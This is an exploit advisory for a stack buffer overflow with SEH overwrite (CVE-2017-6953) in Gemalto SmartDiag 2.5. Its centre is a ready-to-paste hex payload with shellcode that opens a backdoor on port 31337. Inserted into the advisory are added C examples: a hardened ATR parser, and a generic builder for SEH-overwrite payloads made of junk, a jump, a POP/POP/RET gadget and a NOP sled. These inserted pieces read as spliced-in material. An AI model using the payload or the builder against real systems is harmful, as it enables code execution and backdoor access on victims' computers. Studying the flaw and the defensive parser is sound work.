Gemalto SmartDiag Diagnosis Tool 2.5 Buffer Overflow

Gemalto SmartDiag Diagnosis Tool 2.5 Buffer Overflow
Posted May 8, 2017
Authored by Majid Alqabandi

Gemalto SmartDiag Diagnosis Tool versions 2.5 and below buffer overflow exploit with SEH overwrite.

tags | exploit, overflow
advisories | CVE-2017-6953
SHA-256 | f0fdfc5111c06ba95a692a071f3afbae09ba4c4054c74f3f657156eeb1ad1664

# Exploit Title: Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow - SEH Overwrite
# Date: 16-03-2017
# Software Link: http://support.gemalto.com/index.php?id=download_tools
# Exploit Author: Majid Alqabandi
# Contact: https://www.linkedin.com/in/majidalqabandi/
# CVE: CVE-2017-6953
# Category: Local - command execution - Buffer Overflow - SEH Overwrite.

1. Description
SmartDiag.exe is vulnerable to a stack-based buffer overflow that overwrites
a Structured Exception Handler (SEH) record. In the "Register a new card"
dialog, the input fields are copied into a fixed-size stack buffer without a
length check, so an over-long value overruns the buffer, reaches the SEH
chain and leads to arbitrary code execution in the context of the user
running the tool.
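The unsafe copy pattern the description points at, beside a hardened parser that rejects an over-long ATR before anything is copied, as an added C example (not code from the advisory or from Gemalto; the function names, the 64-byte buffer and the sample ATR are assumptions and constructed test data):

```c
/*
 * Added example, not code from the advisory or from Gemalto: the unsafe
 * copy pattern behind a stack overflow in a hex "ATR" input field, beside
 * a hardened parser. Function names and the 64-byte buffer are assumptions
 * for illustration; SmartDiag's real internals are not described on the page.
 */
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* ISO/IEC 7816-3: an ATR is TS plus at most 32 further bytes, 33 bytes in all. */
#define ATR_MAX_BYTES 33u
#define ATR_MAX_HEX   (2u * ATR_MAX_BYTES)

/* Constructed sample ATR (20 bytes) used as test data; not taken from the page. */
static const char SAMPLE_ATR_HEX[] = "3B8F8001804F0CA0000003060300010000000068";

/*
 * Vulnerable pattern (assumed for illustration). The field text is copied
 * into a fixed stack buffer with no length check, so a string of 64 or more
 * characters runs past the buffer into the saved frame and the SEH record
 * that 32-bit Windows keeps on the stack. Never call this with untrusted input.
 */
void register_card_unsafe(const char *atr_text)
{
    char hex[64];
    strcpy(hex, atr_text);   /* unbounded copy: this is the overflow */
    (void)hex;
}

static int hex_nibble(unsigned char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = (unsigned char)tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/*
 * Hardened parser. Decodes atr_text into out (capacity out_cap) and returns
 * the number of ATR bytes, or -1 for anything that is not a plausible ATR:
 * empty, odd length, non-hex characters, longer than ISO 7816-3 allows, or
 * longer than the destination. Every check runs before a byte is written,
 * so an over-long string such as the PoC payload is rejected, never copied.
 */
int parse_atr_hex(const char *atr_text, uint8_t *out, size_t out_cap)
{
    /* Bounded length scan: stop as soon as the input is already too long. */
    size_t len = 0;
    while (len <= ATR_MAX_HEX && atr_text[len] != '\0')
        len++;
    if (len == 0 || len > ATR_MAX_HEX || len % 2 != 0)
        return -1;
    if (len / 2 > out_cap)
        return -1;

    for (size_t i = 0; i < len; i += 2) {
        int hi = hex_nibble((unsigned char)atr_text[i]);
        int lo = hex_nibble((unsigned char)atr_text[i + 1]);
        if (hi < 0 || lo < 0)
            return -1;
        out[i / 2] = (uint8_t)((hi << 4) | lo);
    }
    return (int)(len / 2);
}

/* Verdict-only wrapper: decoded byte count, or -1 if rejected. */
int atr_decoded_length(const char *atr_text)
{
    uint8_t buf[ATR_MAX_BYTES];
    return parse_atr_hex(atr_text, buf, sizeof buf);
}

/* Feed the parser nchars hex digits ('5') to exercise the length check. */
int atr_accepts_length(size_t nchars)
{
    char text[8192];
    if (nchars >= sizeof text) return -1;
    memset(text, '5', nchars);
    text[nchars] = '\0';
    return atr_decoded_length(text);
}

int main(void)
{
    printf("sample ATR: %d bytes\n", atr_decoded_length(SAMPLE_ATR_HEX));
    printf("4600-char PoC-sized string: %d\n", atr_accepts_length(4600));
    return 0;
}
```

The length limit comes from the ATR format itself rather than from the buffer size, which is the check that actually matters here: any input longer than 66 hex characters cannot be an ATR and should be refused at the field, before parsing, regardless of how the buffer behind it is sized.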



2. Proof of Concept

The PoC payload below will:
- Trigger the overflow and overwrite the SEH record.
- Execute the embedded shellcode.
- Open a backdoor listening on port 31337.

To reproduce, start SmartDiag.exe, choose "Register a new card", and enter
the following hex string in the ATR field (tested on Windows 7 x64 and
Windows 8 x64 with SmartDiag v2.5):

528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
52834000528340005283400052834000572b0410477f40008c214100f494
400041ed40003b4140003552011078ab0110010000009cf2021000100000
328b031040000000d02203100120400026e6400090909090e2f500109090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
9090909090909090ddc1d97424f4bbc4aa698a5833c9b15683e8fc315814
0358d0489c7630055f87c076e962f1a48de7a378c5aa4ff28b5ec4760450
6d3c725f6ef0ba33ac92464ee0747681f575bffcf524688aa7d81dce7bd8
f144c3a2749ab71876cb671630f30c70e102c162dd4d6e50954fa6a8567e
8667694e0b79ad69f30cc5898e161ef3549283531f046065ccd3e369b990
ac6d3c74c78ab57b081b8d5f8c4756c1952d39fec68ae65a8c39f3ddcf55
30d0efa55e638397c1df0b948af9ccdba1be432249bf4ae11defe4c01d64
f5edc82ba541a28b152212647cad4d947f67f892b153a974b06337ec3d85
adfe6b1d593d4896fe3eba8a57a9f2c46fd602c3dc7baa8496976fb4a9bd
c7bf92569dd151c6a2fb016b3060d1e2293f86a39c36425e86e070a35eca
3078a3d5b90d9ff1a9cb20be9d8376684b6221da253c9eb4a1b9ec06b7c5
38f15777954468b8714111a4e1aec86c11e550c4baa00154a752fc9bded0
f46325c87d61614e6e1bfa3b9088fb69AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
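How a 32-bit SEH-overwrite payload of this shape is assembled and hex-encoded for a hex-only field, as an added C example that is not part of the advisory. SEH_OFFSET, PPR_GADGET and the INT3 placeholder shellcode are hypothetical values chosen for illustration; they are not the advisory's offsets or addresses, which the page gives only inside the finished hex blob above.

```c
/*
 * Added example, not code from the advisory: how a classic 32-bit SEH
 * overwrite payload is laid out and hex-encoded for a hex-only input field
 * such as the ATR box. SEH_OFFSET, PPR_GADGET and the INT3 placeholder
 * shellcode are hypothetical values for illustration, not SmartDiag's.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SEH_OFFSET   1000u        /* hypothetical: bytes of junk before the nSEH field */
#define PPR_GADGET   0x00401234u  /* hypothetical: POP/POP/RET in a module without SafeSEH */
#define NOP_SLED_LEN 16u

/* Placeholder shellcode: INT3 breakpoints, so a debugger stops where code would run. */
static const uint8_t kShellcode[] = { 0xCC, 0xCC, 0xCC, 0xCC };

#define PAYLOAD_LEN (SEH_OFFSET + 4u + 4u + NOP_SLED_LEN + sizeof kShellcode)

/*
 * Layout: [junk][nSEH][SEH handler][NOP sled][shellcode].
 *
 * When the overflow causes an access violation, the dispatcher calls the
 * overwritten handler, our POP/POP/RET. The two POPs discard the return
 * address and the EXCEPTION_RECORD pointer; RET then pops the third slot,
 * the EstablisherFrame pointer, which is the address of the registration
 * record, i.e. our nSEH bytes. nSEH is therefore executed as code: a short
 * JMP +6 over the 4-byte handler pointer into the NOP sled and shellcode.
 */
size_t build_seh_payload(uint8_t *out, size_t cap)
{
    if (cap < PAYLOAD_LEN)
        return 0;
    size_t p = 0;

    memset(out, 'A', SEH_OFFSET);                 /* junk up to the SEH record */
    p += SEH_OFFSET;

    out[p++] = 0xEB; out[p++] = 0x06;             /* nSEH: JMP SHORT +6 */
    out[p++] = 0x90; out[p++] = 0x90;             /* pad nSEH to 4 bytes */

    out[p++] = (uint8_t)(PPR_GADGET & 0xFF);      /* SEH: gadget, little-endian */
    out[p++] = (uint8_t)((PPR_GADGET >> 8) & 0xFF);
    out[p++] = (uint8_t)((PPR_GADGET >> 16) & 0xFF);
    out[p++] = (uint8_t)((PPR_GADGET >> 24) & 0xFF);

    memset(out + p, 0x90, NOP_SLED_LEN);          /* NOP sled */
    p += NOP_SLED_LEN;

    memcpy(out + p, kShellcode, sizeof kShellcode);
    p += sizeof kShellcode;
    return p;
}

/* Hex-encode n bytes into out (needs 2n+1). Returns chars written, 0 if too small. */
size_t hex_encode(const uint8_t *in, size_t n, char *out, size_t cap)
{
    static const char digits[] = "0123456789abcdef";
    if (cap < 2 * n + 1)
        return 0;
    for (size_t i = 0; i < n; i++) {
        out[2 * i]     = digits[in[i] >> 4];
        out[2 * i + 1] = digits[in[i] & 0x0F];
    }
    out[2 * n] = '\0';
    return 2 * n;
}

/* The finished string as it would be pasted into the field; NULL on error. */
const char *seh_payload_hex(void)
{
    static uint8_t raw[PAYLOAD_LEN];
    static char hex[2 * PAYLOAD_LEN + 1];
    size_t n = build_seh_payload(raw, sizeof raw);
    if (n == 0 || hex_encode(raw, n, hex, sizeof hex) == 0)
        return NULL;
    return hex;
}

int main(void)
{
    const char *h = seh_payload_hex();
    if (h)
        printf("%zu hex chars; nSEH at char %u: %.8s\n",
               strlen(h), 2 * SEH_OFFSET, h + 2 * SEH_OFFSET);
    return 0;
}
```

Two caveats a practitioner would check before reusing this shape: the gadget must come from a module compiled without SafeSEH, or the dispatcher will refuse to call it, and the stack-linked handler chain only exists in 32-bit processes, so a successful run on the Windows 7 x64 and Windows 8 x64 hosts listed above implies the tool executes as a 32-bit application.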



3. Solution:
The vendor has been informed and has confirmed the issue; no fix was
available from the vendor at the time of publication.